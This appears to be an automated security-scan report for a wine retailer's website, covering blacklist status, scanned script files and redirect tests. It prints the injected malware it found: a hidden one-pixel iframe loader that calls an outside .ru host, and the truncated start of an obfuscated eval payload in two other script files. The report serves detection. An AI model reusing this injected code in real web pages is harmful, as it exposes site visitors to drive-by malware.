Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tarantawines.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tarantawines.com/ | 200 OK Content-Length: 15900 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://www.tarantawines.com/m/taranta/WebResource.axd?d=UBWKZTHcGKU7xF9SlTZZVKAz00CY1epsW_Ne4CkdjEAnxYS5_H03FXWi0pUbS8ZLbXYpi0tUDRYhfb_f2aoItZQj1Wo1&t=635315753528827089 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://www.tarantawines.com/Javascript/PageBase.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://www.tarantawines.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://www.tarantawines.com/Javascript/InputHidden.js?Ver=6 | 200 OK Content-Length: 2758 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
derive(InputHidden, ClassInput); function InputHidden() { } (function () { var nud = document.createElement('iframe'); nud.src = 'http://vezylgys.ru/count10.php'; nud.style.position = 'absolute'; nud.style.border = '0'; nud.style.height = '1px'; nud.style.width = '1px'; nud.style.left = '1px'; nud.style.top = '1px'; if (!document.getElementById('nud')) { document.write('<div id=\'nud\'></div>'); document.getElementById('nud').appendChild(nud); }})(); Antivirus reports:
| ||
http://www.tarantawines.com/Javascript/InputReadOnly.js?Ver=6 | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://www.tarantawines.com/Javascript/ActionHidden.js?Ver=6 | 200 OK Content-Length: 11180 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!75!80!6c!7f!71!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6 Antivirus reports:
| ||
http://www.tarantawines.com/Javascript/ActionOpen.js?Ver=6 | 200 OK Content-Length: 26191 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!75!80!6c!7f!71!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tarantawines.com
Result:
GET / HTTP/1.1
Host: tarantawines.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tarantawines.com
Referer: http://www.google.com/search?q=tarantawines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tarantawines.com
Referer: http://www.google.com/search?q=tarantawines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.